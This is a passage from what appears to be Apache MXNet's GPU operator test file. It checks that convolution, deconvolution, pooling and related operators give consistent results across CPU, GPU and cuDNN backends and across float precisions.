'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in ['1', '2']:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
scale = 1
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list, scale=scale)
check_consistency(sym, ctx_list, scale=scale, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
